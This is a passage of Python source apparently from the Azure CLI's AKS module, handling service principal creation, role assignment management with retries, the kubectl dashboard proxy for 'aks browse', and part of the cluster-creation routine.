return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)'
resource_id = resource_id.lower()
match = re.search(pattern, resource_id)
if match:
resource_group_name = match.group(1)
identity_name = match.group(2)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity.client_id
raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_PREFIX in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
disable_sgxquotehelper=False,
assign_identity=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
identity_client_id = service_principal_profile.client_id
if enable_managed_identity and assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
identity_client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
disable_sgxquotehelper
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
